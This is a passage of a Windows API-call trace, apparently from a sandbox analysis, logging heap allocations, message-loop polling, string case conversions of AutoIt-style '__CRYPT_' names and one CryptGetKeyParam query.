lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0043.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.310] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da328 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0043.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0043.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0043.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0043.311] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.311] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0043.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0043.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.312] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.312] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0043.313] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.313] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.313] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0043.313] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0043.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.314] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.314] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0043.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.315] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.316] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.316] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.316] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.317] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.317] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.317] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.317] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.317] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0043.317] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.317] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.317] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.317] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.317] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 